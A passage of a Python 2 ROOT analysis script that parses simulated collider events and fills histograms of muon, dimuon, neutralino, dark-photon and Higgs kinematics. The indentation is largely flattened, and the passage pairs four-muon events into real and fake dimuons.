#h_dimuon_m_real_fake_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_log_0 = ROOT.TH1F("h_dimuon_m_real_fake_log_0", "h_dimuon_m_real_fake_log_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_log_0.SetLineWidth(2)
#h_dimuon_m_real_fake_log_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_log_1 = ROOT.TH1F("h_dimuon_m_real_fake_log_1", "h_dimuon_m_real_fake_log_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_log_1.SetLineWidth(2)
#h_dimuon_m_real_fake_log_1.SetLineStyle(2)
#########################
h_dimuon_m_fake_log_dummy = ROOT.TH1F("h_dimuon_m_fake_log_dummy", "h_dimuon_m_fake_log_dummy", 1250, 0, 125)
h_dimuon_m_fake_log_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_dimuon_m_fake_log_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_log_dummy.SetTitleOffset(1.4, "Y")
h_dimuon_m_fake_log_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_log_dummy.SetMaximum( 1 )
h_dimuon_m_fake_log_0 = ROOT.TH1F("h_dimuon_m_fake_log_0", "h_dimuon_m_fake_log_0", 1250, 0, 125)
h_dimuon_m_fake_log_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_log_0.SetLineWidth(2)
h_dimuon_m_fake_log_0.SetLineStyle(1)
h_dimuon_m_fake_dummy = ROOT.TH1F("h_dimuon_m_fake_dummy", "h_dimuon_m_fake_dummy", nBins, binMin, binMax)
h_dimuon_m_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_m_fake_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_m_fake_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_dummy.SetMaximum( 1.2 )
h_dimuon_m_fake_0 = ROOT.TH1F("h_dimuon_m_fake_0", "h_dimuon_m_fake_0", nBins, binMin, binMax)
h_dimuon_m_fake_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_0.SetLineWidth(2)
h_dimuon_m_fake_0.SetLineStyle(1)
################################################################################
# mass of 2 selected dimuons
################################################################################
m_min = 0.2113
m_max = 3.5536
m_bins = 66
h_m1_vs_m2 = ROOT.TH2F("h_m1_vs_m2", "h_m1_vs_m2", m_bins, m_min, m_max, m_bins, m_min, m_max)
h_m1_vs_m2.SetYTitle("m_{1#mu#mu} [GeV]")
h_m1_vs_m2.SetTitleOffset(1.3, "Y")
h_m1_vs_m2.SetXTitle("m_{2#mu#mu} [GeV]")
h_m1 = ROOT.TH1F("h_m1", "h_m1", 101, 0.1, 10.1)
h_m1.SetLineColor(ROOT.kRed)
h_m1.SetLineWidth(2)
h_m1.SetLineStyle(1)
h_m2 = ROOT.TH1F("h_m2", "h_m2", 101, 0.1, 10.1)
h_m2.SetYTitle("Events / 0.1 GeV")
h_m2.SetXTitle("m_{#mu#mu} [GeV]")
h_m2.SetTitleOffset(1.35, "Y")
h_m2.SetLineColor(ROOT.kBlue)
h_m2.SetLineWidth(2)
h_m2.SetLineStyle(1)
h_m2.SetMaximum(110000)
h_dimuon_1_pT_dummy = ROOT.TH1F("h_dimuon_1_pT_dummy", "h_dimuon_1_pT_dummy", 100, 0, 100)
h_dimuon_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pT_dummy.SetXTitle("p_{T} of #mu#mu [GeV]")
h_dimuon_1_pT_dummy.SetMaximum( 0.1 )
h_dimuon_1_pZ_dummy = ROOT.TH1F("h_dimuon_1_pZ_dummy", "h_dimuon_1_pZ_dummy", 100, 0, 100)
h_dimuon_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pZ_dummy.SetXTitle("|p_{Z}| of #mu#mu [GeV]")
h_dimuon_1_pZ_dummy.SetMaximum( 0.1 )
h_dimuon_1_Eta_dummy = ROOT.TH1F("h_dimuon_1_Eta_dummy", "h_dimuon_1_Eta_dummy",100,-5,5)
h_dimuon_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_dimuon_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Eta_dummy.SetXTitle("#eta of #mu#mu")
h_dimuon_1_Eta_dummy.SetMaximum( 0.1 )
h_dimuon_1_Phi_dummy = ROOT.TH1F("h_dimuon_1_Phi_dummy", "h_dimuon_1_Phi_dummy",80,-4,4 )
h_dimuon_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_dimuon_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Phi_dummy.SetXTitle("#phi of #mu#mu [rad]")
h_dimuon_1_Phi_dummy.SetMaximum( 0.05 )
h_dimuon_1_p_dummy = ROOT.TH1F("h_dimuon_1_p_dummy", "h_dimuon_1_p_dummy", 100, 0, 100)
h_dimuon_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_p_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_p_dummy.SetXTitle("p of #mu#mu [GeV]")
h_dimuon_1_p_dummy.SetMaximum( 0.1 )
h_dimuon_1_M_dummy = ROOT.TH1F("h_dimuon_1_M_dummy", "h_dimuon_1_M_dummy", 50, 0.5, 10.005)
h_dimuon_1_M_dummy.SetYTitle("Fraction of events / 0.2 GeV")
h_dimuon_1_M_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_M_dummy.SetXTitle("Mass of #mu#mu [GeV]")
h_dimuon_1_M_dummy.SetMaximum( 1.4 )
h_dimuon_1_p = ROOT.TH1F("h_dimuon_1_p", "h_dimuon_1_p", 100, 0, 100)
h_dimuon_1_p.SetLineColor(ROOT.kBlue)
h_dimuon_1_p.SetLineWidth(2)
h_dimuon_1_p.SetLineStyle(1)
h_dimuon_1_M = ROOT.TH1F("h_dimuon_1_M", "h_dimuon_1_M", 500, 0.005, 10.005)
h_dimuon_1_M.SetLineColor(ROOT.kBlue)
h_dimuon_1_M.SetLineWidth(2)
h_dimuon_1_M.SetLineStyle(1)
h_dimuon_1_pT = ROOT.TH1F("h_dimuon_1_pT", "h_dimuon_1_pT", 100, 0, 100)
h_dimuon_1_pT.SetLineColor(ROOT.kBlue)
h_dimuon_1_pT.SetLineWidth(2)
h_dimuon_1_pT.SetLineStyle(1)
h_dimuon_1_pZ = ROOT.TH1F("h_dimuon_1_pZ", "h_dimuon_1_pZ", 100, 0, 100)
h_dimuon_1_pZ.SetLineColor(ROOT.kBlue)
h_dimuon_1_pZ.SetLineWidth(2)
h_dimuon_1_pZ.SetLineStyle(1)
h_dimuon_1_Eta = ROOT.TH1F("h_dimuon_1_Eta", "h_dimuon_1_Eta",100,-5,5)
h_dimuon_1_Eta.SetLineColor(ROOT.kBlue)
h_dimuon_1_Eta.SetLineWidth(2)
h_dimuon_1_Eta.SetLineStyle(1)
h_dimuon_1_Phi = ROOT.TH1F("h_dimuon_1_Phi", "h_dimuon_1_Phi", 80,-4,4)
h_dimuon_1_Phi.SetLineColor(ROOT.kBlue)
h_dimuon_1_Phi.SetLineWidth(2)
h_dimuon_1_Phi.SetLineStyle(1)
h_dimuon_2_p = ROOT.TH1F("h_dimuon_2_p", "h_dimuon_2_p", 100, 0, 100)
h_dimuon_2_p.SetLineColor(ROOT.kRed)
h_dimuon_2_p.SetLineWidth(2)
h_dimuon_2_p.SetLineStyle(1)
h_dimuon_2_pT = ROOT.TH1F("h_dimuon_2_pT", "h_dimuon_2_pT", 100, 0, 100)
h_dimuon_2_pT.SetLineColor(ROOT.kRed)
h_dimuon_2_pT.SetLineWidth(2)
h_dimuon_2_pT.SetLineStyle(1)
h_dimuon_2_pZ = ROOT.TH1F("h_dimuon_2_pZ", "h_dimuon_2_pZ", 100, 0, 100)
h_dimuon_2_pZ.SetLineColor(ROOT.kRed)
h_dimuon_2_pZ.SetLineWidth(2)
h_dimuon_2_pZ.SetLineStyle(1)
h_dimuon_2_Eta = ROOT.TH1F("h_dimuon_2_Eta", "h_dimuon_2_Eta", 100,-5,5)
h_dimuon_2_Eta.SetLineColor(ROOT.kRed)
h_dimuon_2_Eta.SetLineWidth(2)
h_dimuon_2_Eta.SetLineStyle(1)
h_dimuon_2_Phi = ROOT.TH1F("h_dimuon_2_Phi", "h_dimuon_2_Phi", 80,-4,4)
h_dimuon_2_Phi.SetLineColor(ROOT.kRed)
h_dimuon_2_Phi.SetLineWidth(2)
h_dimuon_2_Phi.SetLineStyle(1)
################################################################################
# BAM Functions
################################################################################
def plotOverflow(hist):
name = hist.GetName()
title = hist.GetTitle()
nx = hist.GetNbinsX()+1
x1 = hist.GetBinLowEdge(1)
bw = hist.GetBinWidth(nx)
x2 = hist.GetBinLowEdge(nx)+bw
htmp = ROOT.TH1F(name, title, nx, x1, x2)
for i in range(1, nx):
htmp.Fill(htmp.GetBinCenter(i), hist.GetBinContent(i))
    htmp.Fill(htmp.GetBinCenter(nx), hist.GetBinContent(nx)) # add the overflow into the extra last bin (the original filled the underflow at a raw x value)
htmp.SetEntries(hist.GetEntries())
htmp.SetLineColor(hist.GetLineColor())
htmp.SetLineWidth(hist.GetLineWidth())
htmp.SetLineStyle(hist.GetLineStyle())
htmp.DrawNormalized("same")
return
def integral(hist):
eachBinWidth = hist.GetBinWidth(hist.GetNbinsX()+1)
#print "Begin Integral"
#print eachBinWidth
runningSum = 0
for i in range(0, hist.GetNbinsX()+1):
area = eachBinWidth * hist.GetBinContent(i)
runningSum = runningSum + area
#print i
#print area
return runningSum
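# Note: for fixed-width binning this mirrors ROOT's hist.Integral("width") (sum of
# bin content times bin width), except that range(0, ...) also counts the underflow bin 0.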
def getEta(pz, p):
output = atanh(pz/p)
return output
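# atanh(pz/p) is the pseudorapidity eta = -ln(tan(theta/2)), since pz/p = cos(theta)
# and tanh(eta) = cos(theta); it diverges for particles exactly along the beam axis.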
def scaleAxisY(hist, dummy):
normFactor = hist.Integral()
max = hist.GetBinContent(hist.GetMaximumBin()) / normFactor
scale = 1.8
newMax = scale*max
dummy.SetMaximum(newMax)
def scaleAxisYcT(hist, dummy):
normFactor = integral(hist)
max = hist.GetBinContent(hist.GetMaximumBin()) / normFactor
scale = 1.8
newMax = scale*max
dummy.SetMaximum(newMax)
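# Both helpers above set the dummy frame's y-axis maximum to 1.8x the normalized peak
# bin, so the tallest bin of the histogram drawn on top sits at ~55% of the frame height.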
################################################################################
# Loop over events
################################################################################
nEvents = 0
isEvent = False
nEventsOK = 0
for line in f:
if line == '<event>\n':
        isEvent = True
nEvents = nEvents + 1
nLinesInEvent = 0
nParticlesInEvent = 0
muons = []
dimuons = []
DimuonIndex1 = []
DimuonIndex2 = []
bamDimuons = []
FakeIndex1 = []
FakeIndex2 = []
FakeDimuons = []
lifetimes = []
higgs = []
neutralinos = []
darkNeutralinos = []
gammaDs = []
n1PlotCounter = 0
gammaDPlotCounter = 0
nDPlotCounter = 0
if nEvents > nExit: break
continue
if line == '</event>\n':
isEvent = False
continue
if isEvent == True:
nLinesInEvent = nLinesInEvent + 1
#***************************************************************************
# first line with common event information
#***************************************************************************
if nLinesInEvent == 1:
word_n = 0
# print "I", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: NUP = int(word) # number of particles in the event
if word_n == 2: IDPRUP = int(word) # process type
if word_n == 3: XWGTUP = float(word) # event weight
if word_n == 4: SCALUP = float(word) # factorization scale Q
if word_n == 5: AQEDUP = float(word) # the QED coupling alpha_em
if word_n == 6: AQCDUP = float(word) # the QCD coupling alpha_s
if word_n > 6: print "Warning! Wrong common event information", line
#***************************************************************************
# line with particle information
#***************************************************************************
if nLinesInEvent >= 2:
nParticlesInEvent = nParticlesInEvent + 1
word_n = 0
# print "P", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: IDUP = int(word) # particle PDG identity code
if word_n == 2: ISTUP = int(word) # status code
if word_n == 3: MOTHUP1 = int(word) # position of the first mother of particle
if word_n == 4: MOTHUP2 = int(word) # position of the last mother of particle
if word_n == 5: ICOLUP1 = int(word) # tag for the colour flow info
if word_n == 6: ICOLUP2 = int(word) # tag for the colour flow info
if word_n == 7: PUP1 = float(word) # px in GeV
if word_n == 8: PUP2 = float(word) # py in GeV
if word_n == 9: PUP3 = float(word) # pz in GeV
if word_n == 10: PUP4 = float(word) # E in GeV
if word_n == 11: PUP5 = float(word) # m in GeV
if word_n == 12: VTIMUP = float(word) # invariant lifetime ctau in mm
if word_n == 13: SPINUP = float(word) # cosine of the angle between the spin vector of a particle and its three-momentum
if word_n > 13: print "Warning! Wrong particle line", line
if abs(IDUP) == muonID:
if IDUP > 0: q = -1
if IDUP < 0: q = 1
v4 = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
muons.append(( q, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi(), MOTHUP1 ))
if abs(IDUP) == higgsID:
if IDUP > 0: q = 0
if IDUP < 0: q = 0
vHiggs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
higgs.append((q, vHiggs.Px(), vHiggs.Py(), vHiggs.Pz(), vHiggs.E(), vHiggs.M(), vHiggs.Pt(), vHiggs.Eta(), vHiggs.Phi() ))
h_higgs_pT.Fill( higgs[len(higgs)-1][6] )
h_higgs_M.Fill( higgs[len(higgs)-1][5] )
h_higgs_p.Fill( sqrt( higgs[len(higgs)-1][1]*higgs[len(higgs)-1][1] + higgs[len(higgs)-1][2]*higgs[len(higgs)-1][2] + higgs[len(higgs)-1][3]*higgs[len(higgs)-1][3] ) )
h_higgs_pZ.Fill( fabs(higgs[len(higgs)-1][3]) )
#h_higgs_Eta.Fill( higgs[len(higgs)-1][7] )
h_higgs_Phi.Fill( higgs[len(higgs)-1][8] )
if abs(IDUP) == n1ID:
q = 0
vNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
neutralinos.append((q, vNeutralino.Px(), vNeutralino.Py(), vNeutralino.Pz(), vNeutralino.E(), vNeutralino.M(), vNeutralino.Pt(), vNeutralino.Eta(), vNeutralino.Phi() ))
if len(neutralinos) == 2 and n1PlotCounter == 0:
neutralinos_sorted_pT = sorted(neutralinos, key=itemgetter(6), reverse=True)
neutralinos = neutralinos_sorted_pT
h_n1_1_pT.Fill( neutralinos[0][6] )
h_n1_2_pT.Fill( neutralinos[1][6] )
h_n1_1_p.Fill( sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ) )
h_n1_2_p.Fill( sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] ) )
h_n1_1_M.Fill( neutralinos[0][5] )
h_n1_1_M.Fill( neutralinos[1][5] )
h_n1_1_pZ.Fill( fabs(neutralinos[0][3]) )
h_n1_2_pZ.Fill( fabs(neutralinos[1][3]) )
h_n1_1_Eta.Fill( getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))) )
h_n1_1_Phi.Fill( neutralinos[0][8] )
h_n1_2_Eta.Fill( getEta(neutralinos[1][3], sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] )) )
#print "PUP3, PZ, P, ETA:"
#print neutralinos[0][7]
#print neutralinos[0][3]
#print (sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))
#print getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] )))
h_n1_2_Phi.Fill( neutralinos[1][8] )
n1PlotCounter = 1
if abs(IDUP) == nDID:
q = 0
vDarkNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
darkNeutralinos.append((q, vDarkNeutralino.Px(), vDarkNeutralino.Py(), vDarkNeutralino.Pz(), vDarkNeutralino.E(), vDarkNeutralino.M(), vDarkNeutralino.Pt(), vDarkNeutralino.Eta(), vDarkNeutralino.Phi() ))
if len(darkNeutralinos) == 2 and nDPlotCounter == 0:
darkNeutralinos_sorted_pT = sorted(darkNeutralinos, key=itemgetter(6), reverse=True)
darkNeutralinos = darkNeutralinos_sorted_pT
h_nD_1_pT.Fill( darkNeutralinos[0][6] )
h_nD_2_pT.Fill( darkNeutralinos[1][6] )
h_nD_1_p.Fill( sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] ) )
h_nD_2_p.Fill( sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] ) )
h_nD_1_M.Fill( darkNeutralinos[0][5] )
h_nD_1_M.Fill( darkNeutralinos[1][5] )
h_nD_1_pZ.Fill( fabs(darkNeutralinos[0][3]) )
h_nD_2_pZ.Fill( fabs(darkNeutralinos[1][3]) )
h_nD_1_Eta.Fill( getEta(darkNeutralinos[0][3], sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] )) )
h_nD_1_Phi.Fill( darkNeutralinos[0][8] )
                    h_nD_2_Eta.Fill( getEta(darkNeutralinos[1][3], sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] )) )
h_nD_2_Phi.Fill( darkNeutralinos[1][8] )
                    vectorSum = ( ( darkNeutralinos[0][1] + darkNeutralinos[1][1] )*( darkNeutralinos[0][1] + darkNeutralinos[1][1] ) ) + ( (darkNeutralinos[0][2] + darkNeutralinos[1][2])*(darkNeutralinos[0][2] + darkNeutralinos[1][2]) )
                    Etmiss.Fill( sqrt(vectorSum) ) # MET is the magnitude of the summed pT, not its square
nDPlotCounter = 1
if abs(IDUP) == gammaDID:
q = 0
vgammaDs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
gammaDs.append(( q, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.E(), vgammaDs.M(), vgammaDs.Pt(), vgammaDs.Eta(), vgammaDs.Phi()))
h_gammaD_cT.Fill( VTIMUP )
pmom = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() + vgammaDs.Pz()*vgammaDs.Pz() )
beta = pmom/(sqrt(vgammaDs.M()*vgammaDs.M() + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_cT_lab.Fill( lorentz*VTIMUP )
pmomxy = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() )
betaxy = pmomxy/sqrt( vgammaDs.M()*vgammaDs.M() + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_cT_XY_lab.Fill( lorentzxy*VTIMUP )
pmomz = sqrt( vgammaDs.Pz()*vgammaDs.Pz() )
betaz = pmomz/sqrt( vgammaDs.M()*vgammaDs.M() + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_cT_Z_lab.Fill( lorentzZ * VTIMUP )
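                # The three fills above scale the proper decay length VTIMUP (ctau, in mm) by a
                # Lorentz gamma built from the full momentum, its transverse (XY) part, and its
                # z component respectively, each with beta = p/E and gamma = 1/sqrt(1-beta^2).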
lifetimes.append( (VTIMUP, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.Pt(), vgammaDs.M() ))
if len(gammaDs) == 2 and gammaDPlotCounter == 0:
gammaDs_sorted_pT = sorted(gammaDs, key=itemgetter(6), reverse=True)
gammaDs = gammaDs_sorted_pT
lifetimes_sorted_pT = sorted(lifetimes, key=itemgetter(4), reverse=True)
lifetimes = lifetimes_sorted_pT
h_gammaD_1_cT.Fill( lifetimes[0][0] )
pmom = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] + lifetimes[0][3]*lifetimes[0][3] )
beta = pmom/(sqrt(lifetimes[0][5]*lifetimes[0][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_1_cT_lab.Fill( lorentz*lifetimes[0][0] )
#print "pmom, beta, lorentz"
#print pmom
#print beta
#print lorentz
#print lorentz*lifetimes[0][0]
pmomxy = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] )
betaxy = pmomxy/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_1_cT_XY_lab.Fill( lorentzxy*lifetimes[0][0] )
pmomz = sqrt( lifetimes[0][3]*lifetimes[0][3] )
betaz = pmomz/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_1_cT_Z_lab.Fill( lorentzZ * lifetimes[0][0] )
h_gammaD_2_cT.Fill( lifetimes[1][0] )
pmom = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] + lifetimes[1][3]*lifetimes[1][3] )
beta = pmom/(sqrt(lifetimes[1][5]*lifetimes[1][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_2_cT_lab.Fill( lorentz*lifetimes[1][0] )
pmomxy = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] )
betaxy = pmomxy/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_2_cT_XY_lab.Fill( lorentzxy*lifetimes[1][0] )
pmomz = sqrt( lifetimes[1][3]*lifetimes[1][3] )
betaz = pmomz/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_2_cT_Z_lab.Fill( lorentzZ * lifetimes[1][0] )
h_gammaD_1_pT.Fill( gammaDs[0][6] )
h_gammaD_2_pT.Fill( gammaDs[1][6] )
h_gammaD_1_p.Fill( sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) )
h_gammaD_2_p.Fill( sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) )
h_gammaD_1_M.Fill( gammaDs[0][5] )
h_gammaD_1_M.Fill( gammaDs[1][5] )
h_gammaD_1_pZ.Fill( fabs(gammaDs[0][3]) )
h_gammaD_2_pZ.Fill( fabs(gammaDs[1][3]) )
h_gammaD_1_Eta.Fill( getEta(gammaDs[0][3], sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) ) )
h_gammaD_1_Phi.Fill( gammaDs[0][8] )
h_gammaD_2_Eta.Fill( getEta(gammaDs[1][3], sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) ) )
h_gammaD_2_Phi.Fill( gammaDs[1][8] )
gammaDPlotCounter = 1
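# Four-muon events: sort by pT, fill per-rank kinematics, then pair the muons
# into dimuons by generator parent to separate real from fake pairings.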
if len(muons) == 4:
muons_sorted_pT = sorted(muons, key=itemgetter(6), reverse=True)
muons = muons_sorted_pT
h_muon_pT_0.Fill( muons[0][6] )
h_muon_pT_1.Fill( muons[1][6] )
h_muon_pT_2.Fill( muons[2][6] )
h_muon_pT_3.Fill( muons[3][6] )
h_muon_eta_0.Fill( muons[0][7] )
h_muon_eta_1.Fill( muons[1][7] )
h_muon_eta_2.Fill( muons[2][7] )
h_muon_eta_3.Fill( muons[3][7] )
h_muon_phi_0.Fill( muons[0][8] )
h_muon_phi_1.Fill( muons[1][8] )
h_muon_phi_2.Fill( muons[2][8] )
h_muon_phi_3.Fill( muons[3][8] )
h_muon_p_0.Fill( sqrt( muons[0][1]*muons[0][1] + muons[0][2]*muons[0][2] + muons[0][3]*muons[0][3] ) )
h_muon_p_1.Fill( sqrt( muons[1][1]*muons[1][1] + muons[1][2]*muons[1][2] + muons[1][3]*muons[1][3] ) )
h_muon_p_2.Fill( sqrt( muons[2][1]*muons[2][1] + muons[2][2]*muons[2][2] + muons[2][3]*muons[2][3] ) )
h_muon_p_3.Fill( sqrt( muons[3][1]*muons[3][1] + muons[3][2]*muons[3][2] + muons[3][3]*muons[3][3] ) )
h_muon_pZ_0.Fill( muons[0][3] )
h_muon_pZ_1.Fill( muons[1][3] )
h_muon_pZ_2.Fill( muons[2][3] )
h_muon_pZ_3.Fill( muons[3][3] )
parent = muons[1][9] #this is an arbitrary choice to find real dimuons
for i in range(0, len(muons) ):
if parent == muons[i][9]:
DimuonIndex1.append(i)
else:
DimuonIndex2.append(i)
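# Sum the four-momenta within each parent-matched pair to build the two real dimuons.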
px1 = muons[DimuonIndex1[0]][1] + muons[DimuonIndex1[1]][1]
py1 = muons[DimuonIndex1[0]][2] + muons[DimuonIndex1[1]][2]
pz1 = muons[DimuonIndex1[0]][3] + muons[DimuonIndex1[1]][3]
e1 = muons[DimuonIndex1[0]][4] + muons[DimuonIndex1[1]][4]
px2 = muons[DimuonIndex2[0]][1] + muons[DimuonIndex2[1]][1]
py2 = muons[DimuonIndex2[0]][2] + muons[DimuonIndex2[1]][2]
pz2 = muons[DimuonIndex2[0]][3] + muons[DimuonIndex2[1]][3]
e2 = muons[DimuonIndex2[0]][4] + muons[DimuonIndex2[1]][4]
bamV4_1 = ROOT.TLorentzVector(px1, py1, pz1, e1)
bamV4_2 = ROOT.TLorentzVector(px2, py2, pz2, e2)
bamDimuons.append(( bamV4_1.Px(), bamV4_1.Py(), bamV4_1.Pz(), bamV4_1.E(), bamV4_1.M(), bamV4_1.Pt(), bamV4_1.Eta(), bamV4_1.Phi() ))
bamDimuons.append(( bamV4_2.Px(), bamV4_2.Py(), bamV4_2.Pz(), bamV4_2.E(), bamV4_2.M(), bamV4_2.Pt(), bamV4_2.Eta(), bamV4_2.Phi() ))
bamDimuons_Sorted_M = sorted(bamDimuons, key=itemgetter(4), reverse=True)
bamDimuons = bamDimuons_Sorted_M
h_m1_vs_m2.Fill(bamDimuons[0][4],bamDimuons[1][4])
h_m1.Fill(bamDimuons[0][4])
h_m2.Fill(bamDimuons[1][4])
bamDimuons_Sorted_pT = sorted(bamDimuons, key=itemgetter(5), reverse=True)
bamDimuons = bamDimuons_Sorted_pT
h_dimuon_1_pT.Fill(bamDimuons[0][5])
h_dimuon_2_pT.Fill(bamDimuons[1][5])
h_dimuon_1_pZ.Fill(bamDimuons[0][2])
h_dimuon_2_pZ.Fill(bamDimuons[1][2])
h_dimuon_1_p.Fill(sqrt( bamDimuons[0][0]*bamDimuons[0][0] + bamDimuons[0][1]*bamDimuons[0][1] + bamDimuons[0][2]*bamDimuons[0][2] ))
h_dimuon_2_p.Fill(sqrt( bamDimuons[1][0]*bamDimuons[1][0] + bamDimuons[1][1]*bamDimuons[1][1] + bamDimuons[1][2]*bamDimuons[1][2] ))
h_dimuon_1_Eta.Fill(bamDimuons[0][6])
h_dimuon_2_Eta.Fill(bamDimuons[1][6])
h_dimuon_1_Phi.Fill(bamDimuons[0][7])
h_dimuon_2_Phi.Fill(bamDimuons[1][7])
parent = muons[1][9] #this is an arbitrary choice to find the fake dimuons
charge = muons[1][0]
for i in range(0, len(muons) ):
if parent != muons[i][9] and charge != muons[i][0]:
FakeIndex1.append(i)
FakeIndex1.append(1)
for j in range(0, len(muons) ):
if j != FakeIndex1[0] and j != FakeIndex1[1]:
FakeIndex2.append(j)
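# "Fake" dimuons: opposite-charge muons from different parents, i.e. the wrong
# combinatorial pairing; their four-momenta are summed below just like the real pairs.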
Fakepx1 = muons[FakeIndex1[0]][1] + muons[FakeIndex1[1]][1]
Fakepy1 = muons[FakeIndex1[0]][2] + muons[FakeIndex1[1]][2]
Fakepz1 = muons[FakeIndex1[0]][3] + muons[FakeIndex1[1]][3]
Fakee1 = muons[FakeIndex1[0]][4] + muons[FakeIndex1[1]][4]
Fakepx2 = muons[FakeIndex2[0]][1] + muons[FakeIndex2[1]][1]
Fakepy2 = muons[FakeIndex2[0]][2] + muons[FakeIndex2[1]][2]
Fakepz2 = muons[FakeIndex2[0]][3] + muons[FakeIndex2[1]][3]
Fakee2 = muons[FakeIndex2[0]][4] + muons[FakeIndex2[1]][4]
fakeV4_1 = ROOT.TLorentzVector(Fakepx1, Fakepy1, Fakepz1, Fakee1)
fakeV4_2 = ROOT.TLorentzVector(Fakepx2, Fakepy2, Fakepz2, Fakee2)
